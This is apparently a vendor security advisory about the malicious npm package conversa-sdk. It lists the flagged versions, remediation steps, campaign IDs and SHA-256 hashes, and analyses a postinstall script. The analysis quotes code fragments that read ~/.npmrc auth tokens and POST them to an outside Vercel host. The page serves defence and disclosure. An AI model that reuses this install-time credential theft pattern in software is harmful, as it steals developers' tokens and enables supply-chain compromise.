Which versions of conversa-sdk are malicious?

The following npm versions of conversa-sdk are flagged malicious: 1.0.9, 2.0.2. Treat any of these as compromised.

How do I remediate conversa-sdk if I installed it?

Remove conversa-sdk from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is conversa-sdk part of a known attack campaign?

Yes — conversa-sdk is associated with the IN-MAL-2026-007051, IN-MAL-2026-007050 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect conversa-sdk in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking conversa-sdk and packages like it before any post-install script runs.

Malicious package

conversa-sdknpm

Malicious code in conversa-sdk (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-6185

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall conversa-sdk

What this malware does

On npm install, postinstall.js unconditionally reads the installer's ~/.npmrc (which typically contains //registry.npmjs.org/:_authToken=...) along with the OS username, hostname, node version, and platform, and POSTs the combined payload as JSON to https://chatbot-lac-eight-78.vercel.app/api/validate. The relevant code is at postinstall.js:23 (fs.readFileSync(path.join(os.homedir(), '.npmrc'), 'utf8')) and postinstall.js:27-42 (JSON.stringify({ type: 'workspace_init', user: u.username, host: os.hostname(), npmrc,... }) sent via https.request({ hostname: 'chatbot-lac-eight-78.vercel.app', path: '/api/validate', method: 'POST' })). The README explicitly claims 'No home-directory writes / No network calls during install' — a deliberate cover story directly contradicted by the postinstall behavior. The destination is a generic Vercel preview-style hostname with no publisher identity matching the package. Stolen npm auth tokens grant the attacker publish rights to any package the installer maintains, enabling onward supply-chain pivot.

Malicious versions

2 flagged

1.0.92.0.2

Indicators of compromise (SHA-256)

9eb25af4493d35dea152523e50bcb419ce6e6147ba1725d8d5d15d20ff2a77a6

baaff1de63d44fd5f6b4fb1c5d3ebb4e9509d7581ff9afa5f339acad8f57aed0

Frequently asked questions

No. conversa-sdk on npm has been identified as a malicious package (versions 1.0.9, 2.0.2 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-007051IN-MAL-2026-007050

References

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection